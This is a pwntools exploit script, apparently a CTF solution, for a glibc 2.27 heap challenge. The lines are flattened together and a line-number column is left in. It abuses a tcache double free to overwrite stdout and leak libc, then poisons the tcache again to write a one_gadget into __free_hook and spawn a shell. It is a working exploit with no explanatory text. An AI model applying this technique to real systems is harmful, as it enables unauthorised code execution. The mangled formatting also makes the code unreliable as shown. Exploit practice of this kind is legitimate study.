1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60
|
from pwn import *
context.log_level = 'debug'
elf = ELF('./pwn') libc = ELF('/mnt/hgfs/pwn/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so') ld = ELF('/mnt/hgfs/pwn/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/ld-2.27.so') io = process(argv=[ld.path,elf.path],env={'LD_PRELOAD' : libc.path}) one = [0x4f2c5,0x4f322,0x10a38c] stdout = 0x602020
def login(): io.sendlineafter('username:','admin') io.sendlineafter('password:','frame')
def add(name,size,con,ch=1): if ch == 1: io.sendlineafter('>\n','1') else: io.sendlineafter('>','1') io.sendafter('name:',name) io.sendlineafter('size:',str(size)) io.sendafter('tion:',con)
def dele(idx,ch=1): if ch == 1: io.sendlineafter('>\n','2') else: io.sendlineafter('>','2') io.sendlineafter('index:',str(idx)) login() add('0',0x60,'aaaa')
dele(0) dele(0)
add('1',0x60,p64(stdout)) add('2',0x60,'aaaa') add('3',0x60,'\x60')
fake_stdout = p64(0xfbad1800)+p64(0)*3+p8(8) add('4',0x60,fake_stdout)
libc_base = u64(io.recvn(8))-4118704 free_hook = libc_base + libc.sym['__free_hook']
add('5',0x50,'???',2) dele(5,2) dele(5,2) add('6',0x50,p64(free_hook),2) add('7',0x50,'aaaa',2) add('8',0x50,p64(libc_base+one[1]),2)
dele(5,2) io.interactive()
|